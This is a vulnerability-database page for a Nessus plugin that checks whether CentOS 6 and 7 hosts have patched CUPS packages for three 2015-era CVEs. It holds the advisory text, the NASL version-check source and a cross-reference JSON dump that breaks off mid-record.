Search...

CentOS 6 / 7 : cups (CESA-2015:1123)

2015-06-19T00:00:00

ID CENTOS_RHSA-2015-1123.NASL
Type nessus
Reporter This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2015-06-19T00:00:00

Description

Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.

Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

CUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.

A string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)

A cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)

An integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash. (CVE-2014-9679)

Red Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.

All cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Red Hat Security Advisory RHSA-2015:1123 and 
# CentOS Errata and Security Advisory 2015:1123 respectively.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(84276);
  script_version("2.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  script_cve_id("CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159");
  script_bugtraq_id(72594, 75098, 75106);
  script_xref(name:"RHSA", value:"2015:1123");

  script_name(english:"CentOS 6 / 7 : cups (CESA-2015:1123)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote CentOS host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Updated cups packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.

Red Hat Product Security has rated this update as having Important
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

CUPS provides a portable printing layer for Linux, UNIX, and similar
operating systems.

A string reference count bug was found in cupsd, causing premature
freeing of string objects. An attacker can submit a malicious print
job that exploits this flaw to dismantle ACLs protecting privileged
operations, allowing a replacement configuration file to be uploaded
which in turn allows the attacker to run arbitrary code in the CUPS
server (CVE-2015-1158)

A cross-site scripting flaw was found in the cups web templating
engine. An attacker could use this flaw to bypass the default
configuration settings that bind the CUPS scheduler to the 'localhost'
or loopback interface. (CVE-2015-1159)

An integer overflow leading to a heap-based buffer overflow was found
in the way cups handled compressed raster image files. An attacker
could create a specially crafted image file, which when passed via the
cups Raster filter, could cause the cups filter to crash.
(CVE-2014-9679)

Red Hat would like to thank the CERT/CC for reporting CVE-2015-1158
and CVE-2015-1159 issues.

All cups users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing
this update, the cupsd daemon will be restarted automatically."
  );
  # https://lists.centos.org/pipermail/centos-announce/2015-June/021178.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?124ba55b"
  );
  # https://lists.centos.org/pipermail/centos-announce/2015-June/021179.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?646be46a"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected cups packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-1158");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-client");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-filesystem");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-ipptool");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-libs");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-lpd");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:cups-php");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:6");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:7");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/19");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/06/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/06/19");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"CentOS Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/CentOS/release");
if (isnull(release) || "CentOS" &gt;!&lt; release) audit(AUDIT_OS_NOT, "CentOS");
os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS");
os_ver = os_ver[1];
if (! preg(pattern:"^(6|7)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 6.x / 7.x", "CentOS " + os_ver);

if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);


cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" &gt;!&lt; cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu);


flag = 0;
if (rpm_check(release:"CentOS-6", reference:"cups-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-6", reference:"cups-devel-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-6", reference:"cups-libs-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-6", reference:"cups-lpd-1.4.2-67.el6_6.1")) flag++;
if (rpm_check(release:"CentOS-6", reference:"cups-php-1.4.2-67.el6_6.1")) flag++;

if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-client-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-devel-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-filesystem-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-ipptool-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-libs-1.6.3-17.el7_1.1")) flag++;
if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"cups-lpd-1.6.3-17.el7_1.1")) flag++;


if (flag)
{
  security_report_v4(
    port       : 0,
    severity   : SECURITY_HOLE,
    extra      : rpm_report_get()
  );
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "cups / cups-client / cups-devel / cups-filesystem / cups-ipptool / etc");
}

JSON Vulners Source

Initial Source

{"id": "CENTOS_RHSA-2015-1123.NASL", "bulletinFamily": "scanner", "title": "CentOS 6 / 7 : cups (CESA-2015:1123)", "description": "Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.", "published": "2015-06-19T00:00:00", "modified": "2015-06-19T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/84276", "reporter": "This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?646be46a", "http://www.nessus.org/u?124ba55b"], "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "type": "nessus", "lastseen": "2021-01-06T09:30:10", "edition": 28, "viewCount": 51, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K52950150", "SOL52950150", "SOL16794"]}, {"type": "cve", "idList": ["CVE-2015-1158", "CVE-2014-9679", "CVE-2015-1159"]}, {"type": "amazon", "idList": ["ALAS-2015-559"]}, {"type": "fedora", "idList": ["FEDORA:06E556087BD6", "FEDORA:4F41C6087C4D", "FEDORA:A93F061B695F", "FEDORA:4582460157C8"]}, {"type": "redhat", "idList": ["RHSA-2015:1123"]}, {"type": "centos", "idList": ["CESA-2015:1123"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1123"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310871377", "OPENVAS:1361412562310882201", "OPENVAS:1361412562310105298", "OPENVAS:1361412562310882202", "OPENVAS:1361412562310123098", "OPENVAS:1361412562310869456", "OPENVAS:1361412562310120032", "OPENVAS:1361412562310703283", "OPENVAS:1361412562310869513", "OPENVAS:1361412562310121420"]}, {"type": "nessus", "idList": ["ORACLEVM_OVMSA-2015-0071.NASL", "FREEBSD_PKG_A40EC9700EFA11E590E4D050996490D0.NASL", "SL_20150617_CUPS_ON_SL6_X.NASL", "ALA_ALAS-2015-559.NASL", "GENTOO_GLSA-201510-07.NASL", "UBUNTU_USN-2629-1.NASL", "CUPS_2_0_3.NASL", "REDHAT-RHSA-2015-1123.NASL", "DEBIAN_DLA-239.NASL", "ORACLELINUX_ELSA-2015-1123.NASL"]}, {"type": "archlinux", "idList": ["ASA-201506-2"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32208", "SECURITYVULNS:DOC:31770", "SECURITYVULNS:VULN:14295", "SECURITYVULNS:VULN:14537"]}, {"type": "gentoo", "idList": ["GLSA-201510-07", "GLSA-201607-06"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132389", "PACKETSTORM:140920"]}, {"type": "freebsd", "idList": ["A40EC970-0EFA-11E5-90E4-D050996490D0"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3283-1:BE2B4", "DEBIAN:DLA-239-1:10F45", "DEBIAN:DLA-159-1:19AEB", "DEBIAN:DSA-3172-1:C0A28"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4CB42140E06509F8B1AAEC2A1095ADF4", "EXPLOITPACK:892E7440DFB4E752F2AA0B87194C551D"]}, {"type": "cert", "idList": ["VU:810572"]}, {"type": "ubuntu", "idList": ["USN-2520-1", "USN-2629-1"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:5311581F0C084F98DDCD44AEF83A28A7"]}, {"type": "suse", "idList": ["SUSE-SU-2015:1044-2", "OPENSUSE-SU-2015:1056-1", "SUSE-SU-2015:1044-1", "SUSE-SU-2015:1041-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-26891", "1337DAY-ID-23782"]}, {"type": "exploitdb", "idList": ["EDB-ID:37336", "EDB-ID:41233"]}, {"type": "slackware", "idList": ["SSA-2015-188-01"]}], "modified": "2021-01-06T09:30:10", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2021-01-06T09:30:10", "rev": 2}, "vulnersScore": 8.2}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# CentOS Errata and Security Advisory 2015:1123 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84276);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"CentOS 6 / 7 : cups (CESA-2015:1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?124ba55b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?646be46a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1158\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-devel / cups-filesystem / cups-ipptool / etc\");\n}\n", "naslFamily": "CentOS Local Security Checks", "pluginID": "84276", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:cups-libs", "p-cpe:/a:centos:centos:cups-php", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:cups", "p-cpe:/a:centos:centos:cups-ipptool", "p-cpe:/a:centos:centos:cups-client", "p-cpe:/a:centos:centos:cups-lpd", "p-cpe:/a:centos:centos:cups-filesystem", "p-cpe:/a:centos:centos:cups-devel"], "scheme": null}

{"f5": [{"lastseen": "2016-03-19T09:01:42", "bulletinFamily": "software", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "edition": 1, "description": " * [CVE-2015-1158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158>)\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded, which in turn allows the attacker to run arbitrary code on the CUPS server.\n\n * [CVE-2015-1159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1159>)\n\nA cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web.\n", "modified": "2015-06-23T00:00:00", "published": "2015-06-23T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/700/sol16794.html", "id": "SOL16794", "title": "SOL16794 - CUPS vulnerabilities CVE-2015-1158 / CVE-2015-1159", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:10", "bulletinFamily": "software", "cvelist": ["CVE-2014-9679"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.1| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-10-19T00:05:00", "published": "2016-10-19T00:05:00", "href": "https://support.f5.com/csp/article/K52950150", "id": "F5:K52950150", "title": "CUPS vulnerability CVE-2014-9679", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-18T21:25:01", "bulletinFamily": "software", "cvelist": ["CVE-2014-9679"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-10-18T00:00:00", "published": "2016-10-18T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/52/sol52950150.html", "id": "SOL52950150", "type": "f5", "title": "SOL52950150 - CUPS vulnerability CVE-2014-9679", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2021-02-02T06:14:36", "description": "Integer underflow in the cupsRasterReadPixels function in filter/raster.c in CUPS before 2.0.2 allows remote attackers to have unspecified impact via a malformed compressed raster file, which triggers a buffer overflow.", "edition": 6, "cvss3": {}, "published": "2015-02-19T15:59:00", "title": "CVE-2014-9679", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9679"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:apple:cups:2.0.1"], "id": "CVE-2014-9679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9679", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:cups:2.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "The add_job function in scheduler/ipp.c in cupsd in CUPS before 2.0.3 performs incorrect free operations for multiple-value job-originating-host-name attributes, which allows remote attackers to trigger data corruption for reference-counted strings via a crafted (1) IPP_CREATE_JOB or (2) IPP_PRINT_JOB request, as demonstrated by replacing the configuration file and consequently executing arbitrary code.", "edition": 6, "cvss3": {}, "published": "2015-06-26T10:59:00", "title": "CVE-2015-1158", "type": "cve", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1158"], "modified": "2017-09-23T01:29:00", "cpe": ["cpe:/a:cups:cups:2.0.2"], "id": 